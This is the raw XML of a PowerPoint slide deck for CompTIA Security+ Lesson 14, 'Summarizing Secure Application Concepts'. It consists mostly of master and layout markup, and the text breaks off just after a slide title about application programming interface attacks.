                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F0388E-4226-4CD6-8F46-51A6616218D1}"/>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160228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Topic">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id="{52AC8521-3410-4C4A-B7A5-D78B8E51BD90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="408561" y="331611"/>
            <a:ext cx="8326878" cy="3443110"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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id="{261C2E7D-BB67-4F0C-87F1-756FC1974276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>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CC6DF4C4-B555-4514-B737-CAA82E353FFE}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715C7DD6-3E03-4C74-AA30-9E1DF61252FB}"/>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1974321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908539"/>
            <a:ext cx="2057400" cy="3686084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="45545F"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="908539"/>
            <a:ext cx="6019800" cy="3686084"/>
          </a:xfrm>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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="CompTIA_logo.wmf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18730890-2F38-5A47-B746-C8A5D1CBF98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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F281E03-D481-4EFC-AB63-419550B2516E}"/>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8" name="Slide Number Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86BCD7DA-0358-43E2-ACD7-68E89E669AD4}"/>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1382741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C3F268-D399-CD41-93EB-BC0DC0B74CB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4123764"/>
            <a:ext cx="9162288" cy="710498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F10937EE-1C4A-CD4A-8D8B-58C6219952EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="980349"/>
            <a:ext cx="8460152" cy="2990074"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D70EB038-50BA-4CE6-87A2-C19FACD82379}"/>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id="{2054FF0E-4A35-4E41-A39A-DB4BBF4EE009}"/>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5" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD4CB178-C0D6-4552-8FD9-86AB0F833237}"/>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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4507C208-C044-46C7-83CC-E75B2ABE7C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4123764"/>
            <a:ext cx="9162288" cy="710498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129265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2B283-1721-A54D-A0F1-D2BEA4930744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18288" y="4443006"/>
            <a:ext cx="9180576" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE834EAB-3654-8444-AD99-93CDAC63F3F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="980349"/>
            <a:ext cx="8460152" cy="332214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93B92A88-5565-4FAF-B92E-9F074FB192B3}"/>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id="{8C09426C-B0A8-4657-888A-DC0D9715AEF1}"/>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2" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B89E05CC-C080-4076-B555-AC268F249F00}"/>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7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED3E63F-4D30-47E0-82BD-EC78D1288636}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18288" y="4443006"/>
            <a:ext cx="9180576" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137773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CB4C57C-BE7C-4CE4-BEEB-1CCE8258F0A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38442" y="3143794"/>
            <a:ext cx="2205558" cy="1999706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11"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357115EB-6EB9-AD43-BF51-6238C42B69E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>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endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EACD82ED-3ACE-6B4E-AED2-34697AE09C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="980349"/>
            <a:ext cx="7259879" cy="3229986"/>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4" name="Picture 13" descr="CompTIA_logo.wmf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356AF006-7545-FE4E-BA37-FA9657065F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2" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C0E9C0-BE8A-4825-8F47-135B1034D059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1073150" y="4869623"/>
            <a:ext cx="5874411" cy="274637"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CompTIA Security+ Lesson 14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id="{0D623632-4E16-4AD5-AADC-2E340A869461}"/>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10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0296C325-1E58-46BB-8451-0071865A1E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38442" y="3143794"/>
            <a:ext cx="2205558" cy="1999706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2390461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72C6F783-9286-1544-850A-F82A0510B462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="980347"/>
            <a:ext cx="8460152" cy="356759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42D0C1-28C5-40E9-BE4A-2634E3E59F3F}"/>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id="{40AF80CE-1F06-46AF-81FC-3CE6F4E76AEA}"/>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2" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2EB0BAE-96FC-4676-99FD-45D2D9C44FC3}"/>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807182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dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341927" y="968991"/>
            <a:ext cx="4153873" cy="3376241"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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968991"/>
            <a:ext cx="4149294" cy="3376241"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="CompTIA_logo.wmf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{953D7D55-FF4B-144A-9A47-F9B21A50C6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id="{23A873D3-98D7-4852-8AAA-A462C1DE9AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18288" y="4443006"/>
            <a:ext cx="9180576" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B137AA-E8FF-49AE-ADC6-417135EA1C16}"/>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11" name="Slide Number Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC271262-DE56-473E-BD86-378F68F6C885}"/>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9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A6890A2-1520-4E1A-89C6-0F5FBC18CB35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18288" y="4443006"/>
            <a:ext cx="9180576" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385396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927" y="901954"/>
            <a:ext cx="4155461" cy="479822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">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41927" y="1381775"/>
            <a:ext cx="4155461"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901954"/>
            <a:ext cx="4152466" cy="479822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>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9" y="1381775"/>
            <a:ext cx="4152466"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0" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6582580-7A03-4664-A005-282697F7A0C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18288" y="4443006"/>
            <a:ext cx="9180576" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53DEEF49-8B9B-4812-B58D-7F40D0D48FB4}"/>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13" name="Slide Number Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63498844-A48D-4E90-ADCC-5515FCFABD27}"/>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4" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E796A2E-6B98-46DB-AA03-8CCBF05FDFE9}"/>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11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{721E786B-F8BA-4627-865F-686CBCA5D4EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-18288" y="4443006"/>
            <a:ext cx="9180576" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4103617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dirty="0"/>
              <a:t>Click to add title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="CompTIA_logo.wmf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E765CB9-1B51-9D48-955D-6843AA1B95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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F98C097-D8E9-4803-892B-742AFC53C446}"/>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7" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC5696C-27D7-4D5E-BF51-1A71B93F0442}"/>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360141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noProof="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="980348"/>
            <a:ext cx="8460152" cy="3701556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A500BC5A-134F-4047-9D0E-0B8E96244319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064525" y="4869623"/>
            <a:ext cx="7165928" cy="274637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="700" i="0" u="none">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>CompTIA Security+ Lesson 14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id="{3575B0F0-8782-4200-A7ED-327408935744}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="CompTIA_logo.wmf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66775347-A556-4A8A-A644-9477C35B6035}"/>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7" name="Picture 6" descr="CompTIA_logo.wmf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1616228-AD69-497C-B41C-1E9F61544233}"/>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58932730"/>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1" r:id="rId10"/>
    <p:sldLayoutId id="2147483922" r:id="rId11"/>
    <p:sldLayoutId id="2147483923" r:id="rId12"/>
    <p:sldLayoutId id="2147483924" r:id="rId13"/>
    <p:sldLayoutId id="2147483925" r:id="rId14"/>
    <p:sldLayoutId id="2147483926" r:id="rId15"/>
    <p:sldLayoutId id="2147483931" r:id="rId16"/>
    <p:sldLayoutId id="2147483927" r:id="rId17"/>
    <p:sldLayoutId id="2147483928" r:id="rId18"/>
    <p:sldLayoutId id="2147483929" r:id="rId19"/>
    <p:sldLayoutId id="2147483930" r:id="rId20"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Open Sans SemiBold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="257175" indent="-257175" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent5"/>
        </a:buClr>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="685800" indent="-342900" algn="l" defTabSz="342900" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="ED1C24"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>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0461A-AB2A-4F3F-AF50-10AEF2249E42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summarizing Secure Application Concepts </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F16F0882-0FEE-4018-AD24-5B3F5CBA3DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321908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90CD7-00A3-8C06-B891-17904BB3354F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Application Programming Interface Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
